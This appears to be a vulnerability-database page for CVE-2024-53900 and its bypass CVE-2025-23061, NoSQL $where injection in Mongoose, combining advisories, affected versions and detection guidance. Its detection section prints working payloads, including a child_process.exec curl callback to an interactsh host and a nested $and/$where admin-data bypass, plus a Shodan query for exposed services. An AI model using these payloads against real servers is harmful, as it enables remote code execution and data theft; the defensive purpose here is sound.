CVE-2024-53900
published 2024-12-02CVE-2024-53900: Mongoose before 8.8.3 can improperly use $where in match, leading to search injection.
PriorityP180critical9.1CVSS 3.1
AVNACLPRNUINSUCHIHAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
3.99%
89.2th percentile
Mongoose before 8.8.3 can improperly use $where in match, leading to search injection.
Affected
18 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cesanta | mongoose | >= 0 < 6.13.6 | 6.13.6 |
| cesanta | mongoose | >= 3.6.0-rc0 < 5.13.23 | 5.13.23 |
| cesanta | mongoose | >= 6.0.0-rc0 < 6.13.5 | 6.13.5 |
| cesanta | mongoose | >= 7.0.0-rc0 < 7.8.3 | 7.8.3 |
| cesanta | mongoose | >= 7.0.0-rc0 < 7.8.4 | 7.8.4 |
| cesanta | mongoose | >= 8.0.0-rc0 < 8.8.3 | 8.8.3 |
| cesanta | mongoose | >= 8.0.0-rc0 < 8.9.5 | 8.9.5 |
| mongoosejs | mongoose | < 6.13.6 | 6.13.6 |
| mongoosejs | mongoose | < 6.13.5 | 6.13.5 |
| mongoosejs | mongoose | — | — |
| mongoosejs | mongoose | — | — |
| mongoosejs | mongoose | >= 6.0.0 < 6.13.6 | 6.13.6 |
| mongoosejs | mongoose | >= 7.0.0 < 7.8.4 | 7.8.4 |
| mongoosejs | mongoose | >= 7.0.0 < 7.8.4 | 7.8.4 |
| mongoosejs | mongoose | >= 7.0.1 < 7.8.3 | 7.8.3 |
| mongoosejs | mongoose | >= 8.0.0 < 8.9.5 | 8.9.5 |
| mongoosejs | mongoose | >= 8.0.0 < 8.9.5 | 8.9.5 |
| mongoosejs | mongoose | >= 8.0.1 < 8.8.3 | 8.8.3 |
Detection & IOCsextracted from sources · hover to see the quote
url{{BaseURL}}?view[path]=author&view[match][$where]=global.process.mainModule.constructor._load('child_process').exec('curl {{interactsh-url}}')
commandglobal.process.mainModule.constructor._load('child_process').exec('curl {{interactsh-url}}')
url{{BaseURL}}/posts?authorMatch={"$and":[{"$where":"this.isAdmin"}]}
otherview[match][$where]=
other{"$and":[{"$where":"this.isAdmin"}]}
- →Detect CVE-2024-53900 exploitation by monitoring HTTP GET requests containing '$where' within the 'match' query parameter, specifically the pattern 'view[match][$where]=' in request URLs targeting Mongoose-backed Node.js applications.
- →Detect CVE-2025-23061 bypass (incomplete fix for CVE-2024-53900) by monitoring for nested $where operators inside logical operators such as $and in query parameters, e.g. '$and':[{'$where':...}] in HTTP requests to populate()-backed endpoints.
- →Response-based detection: a successful exploit of the nested $where bypass returns a JSON body containing '"isAdmin":true' alongside '"title":' and '"username":' fields with HTTP 200 and Content-Type application/json.
- →Out-of-band detection: monitor for outbound curl HTTP callbacks to an interactsh/OAST collector originating from the MongoDB/Node.js server process, triggered by the injected child_process.exec payload.
- →Use Shodan query 'Server: Mongoose' or title:"Mongoose" to identify potentially exposed Mongoose-backed services for proactive scanning.
- ·CVE-2024-53900 affects Mongoose versions before 8.8.3; the incomplete fix was bypassed in CVE-2025-23061, which requires Mongoose < 8.9.5. Detection rules should account for both version ranges. ↗
- ·The CVE-2025-23061 bypass works specifically because the patched code blocks direct top-level $where but does not recurse into nested logical operators ($and, $or, etc.); detection logic must inspect nested query structures, not just top-level keys.
- ·The exploit path targets the populate() function's 'match' option; detection should be scoped to endpoints that accept user-controlled match/filter parameters passed to Mongoose populate(), not all MongoDB query endpoints.
CVSS provenance
nvdv3.19.1CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
ghsa9.1CRITICAL
osv9.1CRITICAL
vulncheck9.1CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Mongoose search injection vulnerability
ghsa·2025-01-15·CVSS 9.1
CVE-2025-23061 [CRITICAL] CWE-94 Mongoose search injection vulnerability
Mongoose search injection vulnerability
Mongoose versions prior to 8.9.5, 7.8.4, and 6.13.6 are vulnerable to improper use of the `$where` operator. This vulnerability arises from the ability of the `$where` clause to execute arbitrary JavaScript code in MongoDB queries, potentially leading to code injection attacks and unauthorized access or manipulation of database data.
NOTE: this issue exists because of an incomplete fix for CVE-2024-53900.
OSV
Mongoose search injection vulnerability
osv·2025-01-15·CVSS 9.1
CVE-2025-23061 [CRITICAL] Mongoose search injection vulnerability
Mongoose search injection vulnerability
Mongoose versions prior to 8.9.5, 7.8.4, and 6.13.6 are vulnerable to improper use of the `$where` operator. This vulnerability arises from the ability of the `$where` clause to execute arbitrary JavaScript code in MongoDB queries, potentially leading to code injection attacks and unauthorized access or manipulation of database data.
NOTE: this issue exists because of an incomplete fix for CVE-2024-53900.
OSV
Mongoose search injection vulnerability
osv·2024-12-02
CVE-2024-53900 [HIGH] Mongoose search injection vulnerability
Mongoose search injection vulnerability
Mongoose versions prior to 8.8.3, 7.8.3, 6.13.5, and 5.13.23 are vulnerable to improper use of the $where operator. This vulnerability arises from the ability of the $where clause to execute arbitrary JavaScript code in MongoDB queries, potentially leading to code injection attacks and unauthorized access or manipulation of database data.
GHSA
Mongoose search injection vulnerability
ghsa·2024-12-02
CVE-2024-53900 [HIGH] CWE-89 Mongoose search injection vulnerability
Mongoose search injection vulnerability
Mongoose versions prior to 8.8.3, 7.8.3, 6.13.5, and 5.13.23 are vulnerable to improper use of the $where operator. This vulnerability arises from the ability of the $where clause to execute arbitrary JavaScript code in MongoDB queries, potentially leading to code injection attacks and unauthorized access or manipulation of database data.
VulnCheck
mongoosejs mongoose Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2024·CVSS 9.1
CVE-2024-53900 [CRITICAL] mongoosejs mongoose Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
mongoosejs mongoose Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Mongoose before 8.8.3 can improperly use $where in match, leading to search injection.
Affected: mongoosejs mongoose
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2024-53900
Exploit PoC: https://vulncheck.com/xdb/e7514d843948
No detection rules found.
Nuclei
Mongoose - NoSQL Injection
nuclei·CVSS 9.1
CVE-2025-23061 [CRITICAL] Mongoose - NoSQL Injection
Mongoose - NoSQL Injection
NoSQL injection vulnerability in Mongoose < 8.9.5 affecting the populate() function's match option. This vulnerability exists due to an incomplete fix for CVE-2024-53900. While direct $where injection is blocked, attackers can bypass this protection by nesting $where operators within logical operators like $and, allowing execution of arbitrary JavaScript code on MongoDB server, bypassing authentication, and accessing sensitive administrative data.
Template:
id: CVE-2025-23061
info:
name: Mongoose - NoSQL Injection
author: NamhyunKo
severity: critical
description: |
NoSQL injection vulnerability in Mongoose < 8.9.5 affecting the populate() function's match option. This vulnerability exists due to an incomplete fix for CVE-2024-53900. While direct $where inject
Nuclei
Mongoose < 8.8.3 - Remote Code Execution
nuclei·CVSS 9.1
CVE-2024-53900 [CRITICAL] Mongoose < 8.8.3 - Remote Code Execution
Mongoose < 8.8.3 - Remote Code Execution
Mongoose before 8.8.3 can improperly use $where in match, leading to search injection.
Template:
id: CVE-2024-53900
info:
name: Mongoose < 8.8.3 - Remote Code Execution
author: h4mg
severity: critical
description: |
Mongoose before 8.8.3 can improperly use $where in match, leading to search injection.
impact: |
Unauthenticated attackers can execute arbitrary code by exploiting NoSQL injection in the $where clause, allowing remote code execution via crafted query parameters.
remediation: |
Update Mongoose to version 8.8.3 or later to address the NoSQL injection vulnerability.
reference:
- https://github.com/Automattic/mongoose/commit/c9e86bff7eef477da75a29af62a06d41a835a156
- https://github.com/advisories/GHSA-m7xq-9374-9rvx
- https://www.youtube
No writeups or analysis indexed.
https://github.com/Automattic/mongoose/blob/master/CHANGELOG.mdhttps://github.com/Automattic/mongoose/commit/c9e86bff7eef477da75a29af62a06d41a835a156https://github.com/Automattic/mongoose/releaseshttps://github.com/advisories/GHSA-m7xq-9374-9rvxhttps://www.npmjs.com/package/mongoose?activeTab=versions
2024-12-02
Published
Exploited in the wild